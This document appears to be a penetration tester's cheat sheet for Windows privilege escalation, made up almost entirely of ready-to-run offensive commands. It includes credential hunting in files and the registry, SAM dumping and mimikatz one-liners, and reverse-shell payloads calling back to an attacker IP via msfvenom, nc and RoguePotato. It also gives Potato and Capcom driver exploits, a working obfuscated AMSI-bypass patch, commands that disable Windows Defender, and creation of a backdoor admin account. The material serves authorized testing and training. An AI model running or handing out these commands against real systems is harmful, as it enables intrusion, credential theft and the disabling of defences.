Skip to content

Windows

System enumeration

hostname
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" # /B Matches the text pattern if it is at the beginning of a line.
wmic qfe # extract patches (KB), wmic = windows management instrumentation cmd line, qfe = quick fix engineering
wmic qfe get Caption,Description,HotFixID,InstalledOn # extract patches with these specifics columns
wmic logicaldisk
wmic logicaldisk get caption,description,providername # look if there is other existing drives

Users enumeration

whoami /all
net users
net user administrator
wmic useraccount list brief # includes SID
net localgroup
net localgroup administrators

Network enumeration

ipconfig
ipconfig /all
arp -a
route print
netstat -ano
# fport supports Windows NT4, Windows 2000 and Windows XP
# fport reports all open TCP/IP and UDP ports and maps them to the owning application.
Fport.exe /p

Antivirus and Firewall enumeration

sc query windefend # sc = service control, windefend is the default windows antivirus
sc queryex type= service # all the services running, search for AV such as sophos, avast...
netsh advfirewall firewall dump # modern command, show firewall state
netsh firewall show state # old comand
netsh firewall show config

Account lockout

net accounts
net accounts /domain

PowerShell Enumeration

$ExecutionContext.SessionState.LanguageMode
Get-ExecutionPolicy

Tools

  • https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
  • https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc

Kernel Exploit

  • https://github.com/SecWiki/windows-kernel-exploits
  • https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py

python2 windows-exploit-suggester.py --update
python2 windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo systeminfo.txt
MSF 
post/multi/recon/local_exploit_suggester

Password Hunting

Enumerate folders
tree /f /a # in users directory
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt *.conf* # search for file contents
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* # search filename
Unattend files

dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
MSF 
post/windows/gather/enum_unattend

PowerShell history
type C:\Users\theuser\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Unmounted volumes
mountvol
mkdir vol
mountvol vol \\?\Volume{uuid}\
cd vol
dir /s /a
Search registry
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
mRemoteNG
  • https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py

HiveNightmare

icacls C:\Windows\system32\config\sam
  • https://github.com/GossiTheDog/HiveNightmare
python3 secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

Stored credentials

cmdkey /list
runas /user:Administrator /savecred "net user newadmin pass /add"

WSL

where /R c:\windows wsl.exe
where /R c:\windows bash.exe

wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'

Registry

Autorun
C:\Users\User\Desktop\Tools\Accesschk\accesschk64.exe -wvu "C:\Program Files\Autorun Program"
Always Install Elevated

reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer

msfvenom -p windows/x64/shell_reverse_tcp LHOST=$VPN LPORT=443 -f msi -o rev.msi
msiexec /quiet /qn /i C:\Windows\Tasks\rev.msi

Drivers

driverquery /v  # enumerate the drivers that are installed
searchsploit <driver name>
  • the driver directory is often found under C:\Windows\System32\DRIVERS but sometimes in "C:\Program Files". Drivers are .inf filetype.
type USBPcap.inf # get driver version

Compile C/C++ code on Windows: https://www.mingw-w64.org/

mingw-w64.bat
gcc --help # sets up the PATH environment variable for the gcc executable

Impersonation Privileges

whoami /priv
Restore Privileges
  • This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only.
  • https://github.com/itm4n/FullPowers
SeImpersonatePrivilege

  • https://jlajara.gitlab.io/Potatoes_Windows_Privesc

  • Sweet Potato to rule them all : https://github.com/CCob/SweetPotato

  • If the machine is < Windows 10 1809 < Windows Server 2019 : https://github.com/ohpe/juicy-potato/

    • test for clsid : https://github.com/ohpe/juicy-potato/tree/master/CLSID
# Always use full path !!!
JuicyPotato.exe -t * -p C:\Windows\Tasks\nc.bat -l 1337 -c <clsid>

  • If the machine is >= Windows 10 1809 & Windows Server 2019 :

  • https://github.com/antonioCoco/RoguePotato 

# On attacking machine
socat tcp-listen:135,reuseaddr,fork tcp:VICTIM_IP:9999

# On victim machine
.\RoguePotato.exe -r ATTACKING_IP -e "C:\Windows\Tasks\nc.exe ATTACKING_IP 1234 -e cmd.exe" -l 9999
  • https://github.com/itm4n/PrintSpoofer
PrintSpoofer64.exe -i -c cmd.exe
SeLoadDriver
  • Explainations : https://www.tarlogic.com/blog/abusing-seloaddriverprivilege-for-privilege-escalation/
  • Walkthrough : https://0xdf.gitlab.io/2020/10/31/htb-fuse.html#priv-svc-print--system
  • Load the vulnerable driver : https://github.com/TarlogicSecurity/EoPLoadDriver/blob/master/eoploaddriver.cpp
  • Capcom.sys, a vulnerable driver : https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys
  • Exploit Capcom : https://github.com/tandasat/ExploitCapcom

Compile the files using Visual Studio. Release / x64 -> Build. Remove the include "stdafx.h" if error. You should modify the TCHAR CommandLine[] = TEXT("C:\Windows\system32\cmd.exe"); launched in the exploit first. Replace by a rev generated using msfvenom. Load then exploit the vulnerable driver. 

./EoPLoadDriver.exe System\CurrentControlSet\MyService C:\Users\svc-print\Capcom.sys
./ExploitCapcom.exe

Unquoted Service Paths

  • When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
# find unquoted service
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

# check if running as system or admin
sc qc <service_name>

# check path
icacls <service_path>

# After creating or replacing the binary by a malicious one
# if start type is Auto, you need SeShutdownPrivilege to reboot
shutdown /r /t 0

Localhost services

Chisel
  • https://github.com/jpillora/chisel

Access localhost port 8888 on victim machine from attacking machine 

./chisel_1.7.7_linux_amd64 server -p 9876 --reverse  # attacking machine
./chisel_1.7.7_windows_amd64 client 10.10.14.20:9876 R:8888:127.0.0.1:8888 # victim machine

AMSI bypass

  • https://badoption.eu/blog/2023/07/15/divideconqer.html
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $Win32

$k = [Win32]
$a = "axmxsxix.xdxlxlx".Replace("x","")
$LoadLibrary = $k::LoadLibrary($a)
$b= "AxmxsxixSxcxaxnxBxuxfxfxexrx".Replace("x","")
$Address = $k::GetProcAddress($LoadLibrary, $b)
$p = 0
$k::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
$x = [System.Runtime.InteropServices.Marshal]
$x::Copy($Patch, 0, $Address, 6)

Add admin account Windows

net user pentest Pentest1! /add
net localgroup administrators /add pentest

Add exclusions

Set-MpPreference -DisableRealTimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableScriptScanning 1
Add-MpPreference -ExclusionPath "C:\Windows\Tasks"
Set-MpPreference -ExclusionProcess "legit.txt","powershell.exe","msbuild.exe"

Bypass UAC

  • https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/

Enable RDP from CLI

  • https://support.moonpoint.com/os/windows/software/remote-control/rdp/rdp-registry.php
net localgroup "Remote Desktop Users" /add pentest
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netstat -ano | find "3389"
netsh firewall set portopening protocol = TCP port = 3389 name = "RDP" mode = ENABLE scope = CUSTOM $LHOST
rdesktop $IP -u pentest -p Pentest1!

Admin to System

PsExec.exe -s -i cmd.exe
  • https://twitter.com/cyb3rops/status/1448208520680284164
\\live.sysinternals.com\tools\PsExec.exe -s -c cmd.exe

Mimikatz one liner

mimikatz.exe "privilege::debug" "lsadump::sam" "exit"
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
mimikatz.exe "privilege::debug" "sekurlsa::tickets" "exit"